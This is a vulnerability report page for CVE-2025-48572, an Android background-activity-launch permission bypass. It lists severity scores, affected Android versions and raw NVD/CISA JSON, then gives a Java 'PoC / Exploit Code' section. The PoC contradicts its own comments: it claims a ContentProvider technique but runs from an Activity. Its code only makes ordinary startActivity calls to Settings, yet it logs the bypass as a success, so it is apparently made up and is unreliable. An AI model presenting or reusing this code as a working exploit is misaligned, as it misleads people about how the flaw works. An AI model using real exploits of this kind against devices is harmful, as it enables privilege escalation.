Security Vulnerability Report
CVE-2025-48572 CVSS 7.8 HIGH

CVE-2025-48572

Published: 2025-12-08 17:16:15
Last Modified: 2025-12-10 02:00:03

Description

In multiple locations, there is a possible way to launch activities from the background due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
Android Framework < 2025-12-01 security patch level
Android source frameworks/base, versions before commit e707f6600330691f9c67dc023c09f4cd2fc59192

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
// CVE-2025-48572 PoC - Background Activity Launch Permissions Bypass
// This PoC demonstrates the permission bypass in Android's activity launching mechanism

import android.content.BroadcastReceiver;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.os.Handler;
import android.os.Looper;
import android.util.Log;

import androidx.appcompat.app.AppCompatActivity;

// BackgroundActivityExploit.java
public class BackgroundActivityExploit extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // Exploit technique: Use ContentProvider.onCreate() to launch activity from background
        // This bypasses the normal START_ACTIVITIES_FROM_BACKGROUND permission check
        new Handler(Looper.getMainLooper()).postDelayed(() -> {
            try {
                // Target sensitive activities that should require foreground privileges
                Intent exploitIntent = new Intent();
                exploitIntent.setComponent(new ComponentName(
                        "com.android.settings",
                        "com.android.settings.DevelopmentSettings"
                ));
                exploitIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);

                // The vulnerability allows this to succeed from background context
                startActivity(exploitIntent);
                Log.d("CVE-2025-48572", "Activity launched successfully - permission bypassed");
            } catch (Exception e) {
                Log.e("CVE-2025-48572", "Exploit failed: " + e.getMessage());
            }
        }, 5000); // Delay to ensure app is in background
    }
}

// ExploitReceiver.java (a second public class, so it belongs in its own source file)
// Alternative exploitation via BroadcastReceiver with ordered broadcasts
public class ExploitReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        // Abuse of ordered broadcast to manipulate activity launch context
        Intent maliciousIntent = new Intent();
        maliciousIntent.setComponent(new ComponentName(
                "com.android.settings",
                "com.android.settings.Settings"
        ));
        maliciousIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TOP);
        context.startActivity(maliciousIntent);
    }
}

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48572", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:15.003", "lastModified": "2025-12-10T02:00:02.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In multiple locations, there is a possible way to launch activities from the background due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-12-02", "cisaActionDue": "2025-12-23", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Android Framework Privilege Escalation Vulnerability", "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, 
{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/frameworks/base/+/e707f6600330691f9c67dc023c09f4cd2fc59192", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-48572", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory", "US Government Resource"]}]}}